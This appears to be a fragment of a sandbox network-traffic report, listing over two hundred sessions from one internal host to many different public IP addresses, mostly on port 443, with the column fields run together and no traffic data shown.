                                                17063192.168.2.1352632223.211.249.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17064192.168.2.1339438176.247.201.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17065192.168.2.1336350147.9.2.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17066192.168.2.1348074112.159.38.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17067192.168.2.1345902118.197.55.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17068192.168.2.1341868136.123.193.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17069192.168.2.135904467.8.108.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17070192.168.2.1350116162.13.142.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17071192.168.2.1334868186.164.59.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17072192.168.2.13489128.12.81.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17073192.168.2.135551049.149.212.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17074192.168.2.1354016124.15.189.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17075192.168.2.135766613.15.236.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17076192.168.2.135375470.72.210.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17077192.168.2.1345352124.123.164.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17078192.168.2.135916295.198.86.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17079192.168.2.1338420128.73.50.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17080192.168.2.1345948180.100.196.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17081192.168.2.133542695.217.112.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17082192.168.2.134734844.226.188.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17083192.168.2.1359864185.162.39.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17084192.168.2.134986093.41.52.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17085192.168.2.1356314159.19.114.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17086192.168.2.1349350218.63.192.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17087192.168.2.133351084.150.31.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17088192.168.2.1334440128.116.65.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17089192.168.2.1356614124.94.235.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17090192.168.2.1359634177.239.172.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17091192.168.2.133407295.71.239.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17092192.168.2.1359144186.105.22.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17093192.168.2.1344202186.105.170.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17094192.168.2.1359944174.21.219.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17095192.168.2.1344790161.179.251.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17096192.168.2.13556708.135.82.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17097192.168.2.134193817.91.17.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17098192.168.2.1346060113.87.208.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17099192.168.2.135786444.254.34.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17100192.168.2.1345978156.238.221.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17101192.168.2.134687862.50.130.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17102192.168.2.1357458134.18.170.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17103192.168.2.134514287.175.230.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17104192.168.2.1350012115.46.79.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17105192.168.2.1350866182.237.22.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17106192.168.2.1345872188.189.92.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17107192.168.2.1344500128.156.221.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17108192.168.2.1351776222.67.158.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17109192.168.2.1343966205.72.185.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17110192.168.2.1354312210.20.88.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17111192.168.2.1342274119.146.35.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17112192.168.2.1348888121.208.131.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17113192.168.2.134256874.186.124.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17114192.168.2.1346626110.140.31.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17115192.168.2.1345358135.126.151.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17116192.168.2.1333744172.130.7.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17117192.168.2.1360174122.77.34.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17118192.168.2.134108087.90.81.2248080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17119192.168.2.1336758138.28.167.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17120192.168.2.1344578144.57.67.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17121192.168.2.1358728201.132.73.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17122192.168.2.1340068123.62.170.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17123192.168.2.135321897.234.55.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17124192.168.2.135862025.45.194.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17125192.168.2.133539036.146.7.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17126192.168.2.1333486162.245.172.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17127192.168.2.133430042.228.68.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17128192.168.2.1345006101.184.42.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17129192.168.2.1335318200.118.10.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17130192.168.2.1337276102.229.68.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17131192.168.2.134311294.236.39.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17132192.168.2.1333818124.14.21.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17133192.168.2.1351770217.76.101.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17134192.168.2.1339656161.234.21.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17135192.168.2.1336592189.121.193.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17136192.168.2.1354512144.183.206.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17137192.168.2.1336258111.15.255.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17138192.168.2.1342230132.173.250.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17139192.168.2.134630424.17.149.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17140192.168.2.134477479.62.145.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17141192.168.2.135657844.36.143.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17142192.168.2.1354528192.49.131.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17143192.168.2.135801864.6.143.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17144192.168.2.1339144218.118.165.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17145192.168.2.134122268.143.38.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17146192.168.2.1357688157.152.215.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17147192.168.2.134729847.42.59.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17148192.168.2.133517653.81.98.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17149192.168.2.135403480.187.86.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17150192.168.2.1337584178.168.45.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17151192.168.2.135127861.209.56.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17152192.168.2.134459075.118.102.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17153192.168.2.1354230124.97.227.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17154192.168.2.1344754183.111.136.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17155192.168.2.134608058.190.172.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17156192.168.2.134280678.22.198.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17157192.168.2.1354706136.133.120.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17158192.168.2.1333724221.214.69.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17159192.168.2.13408742.22.103.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17160192.168.2.1355978144.229.176.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17161192.168.2.1346700219.108.58.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17162192.168.2.1347448179.37.22.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17163192.168.2.135099419.130.10.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17164192.168.2.1355770141.54.219.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17165192.168.2.1350796197.227.135.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17166192.168.2.1355328136.61.22.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17167192.168.2.1337956120.188.18.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17168192.168.2.1355154110.88.163.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17169192.168.2.1338478171.118.203.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17170192.168.2.1341740183.68.39.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17171192.168.2.1342900169.75.13.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17172192.168.2.135410068.56.107.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17173192.168.2.1342136159.249.88.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17174192.168.2.133925265.126.250.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17175192.168.2.1341328148.1.98.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17176192.168.2.1353402121.138.166.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17177192.168.2.1357264126.2.104.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17178192.168.2.134779496.180.31.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17179192.168.2.134864012.218.36.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17180192.168.2.1343378130.199.250.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17181192.168.2.1350042128.9.196.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17182192.168.2.1345572203.6.107.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17183192.168.2.1336264161.166.144.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17184192.168.2.133559896.23.206.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17185192.168.2.135056847.120.206.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17186192.168.2.1342022116.229.199.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17187192.168.2.1337018221.72.184.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17188192.168.2.135258274.170.125.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17189192.168.2.1337080150.68.146.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17190192.168.2.1341396103.140.154.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17191192.168.2.133957264.254.19.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17192192.168.2.1345458120.180.180.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17193192.168.2.134520848.161.237.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17194192.168.2.1345380195.174.157.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17195192.168.2.1353832145.47.191.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17196192.168.2.1341408132.167.92.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17197192.168.2.135119242.16.85.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17198192.168.2.134270251.239.31.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17199192.168.2.1351722196.128.195.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17200192.168.2.1337926184.34.203.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17201192.168.2.13595185.171.188.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17202192.168.2.1353978155.194.175.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17203192.168.2.13405464.98.27.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17204192.168.2.1343784126.32.154.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17205192.168.2.134787898.152.72.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17206192.168.2.1359868211.40.13.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17207192.168.2.1343990161.199.67.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17208192.168.2.13506342.10.200.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17209192.168.2.134555246.211.215.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17210192.168.2.1355284129.170.252.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17211192.168.2.1340472183.129.71.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17212192.168.2.135093027.225.90.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17213192.168.2.133810058.251.69.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17214192.168.2.1348206174.50.180.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17215192.168.2.1337334168.25.158.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17216192.168.2.1348922131.195.94.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17217192.168.2.135951832.171.238.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17218192.168.2.1343098175.255.79.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17219192.168.2.1339342213.239.190.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17220192.168.2.135915845.218.210.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17221192.168.2.1344642207.164.69.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17222192.168.2.133653236.70.118.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17223192.168.2.1333052103.68.188.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17224192.168.2.1352988193.243.78.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17225192.168.2.1344512172.195.18.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17226192.168.2.1344068203.172.50.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17227192.168.2.1336668110.180.244.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17228192.168.2.1334106119.102.42.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17229192.168.2.134284237.14.208.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17230192.168.2.133947690.128.162.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17231192.168.2.1348580104.68.125.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17232192.168.2.1345998119.115.18.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17233192.168.2.1351348189.205.97.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17234192.168.2.1348666128.122.243.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17235192.168.2.1354300110.83.48.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17236192.168.2.1346124122.187.132.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17237192.168.2.1347926210.197.147.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17238192.168.2.135705452.218.9.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17239192.168.2.135255246.67.65.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17240192.168.2.1355432105.196.37.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17241192.168.2.1351886219.191.101.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17242192.168.2.13536462.177.98.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17243192.168.2.1347054159.111.239.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17244192.168.2.1358362130.107.62.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17245192.168.2.1356442210.50.71.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17246192.168.2.1354398147.91.170.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17247192.168.2.133612246.247.83.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17248192.168.2.135392663.172.241.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17249192.168.2.1347014118.38.251.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17250192.168.2.133788871.114.152.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17251192.168.2.1350740117.115.101.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17252192.168.2.1348226223.241.2.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17253192.168.2.135606664.39.29.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17254192.168.2.133446059.91.187.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17255192.168.2.1360880179.155.204.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17256192.168.2.1333942132.41.1.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17257192.168.2.1357438169.104.70.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17258192.168.2.1333564165.92.11.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17259192.168.2.134951051.137.174.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17260192.168.2.1356452173.185.166.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17261192.168.2.135745231.175.31.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17262192.168.2.1335948174.119.153.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17263192.168.2.134552458.81.62.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17264192.168.2.1332938177.73.203.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17265192.168.2.1358752221.0.242.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17266192.168.2.134565282.62.178.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17267192.168.2.135134293.116.175.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17268192.168.2.1346558223.216.7.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17269192.168.2.134833039.13.76.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17270192.168.2.133970853.105.67.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17271192.168.2.1339524195.3.132.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17272192.168.2.1335144133.90.81.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17273192.168.2.1337056179.31.208.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17274192.168.2.1356630193.134.175.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17275192.168.2.1355542161.100.31.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17276192.168.2.135756613.148.3.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17277192.168.2.1347314136.77.91.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17278192.168.2.134872659.17.25.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17279192.168.2.1337334190.174.35.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17280192.168.2.1348968208.165.135.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17281192.168.2.1340382109.173.136.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17282192.168.2.1358526190.116.15.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17283192.168.2.1344344175.163.106.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17284192.168.2.1346138167.78.158.9443
                                                TimestampBytes transferredDirectionData


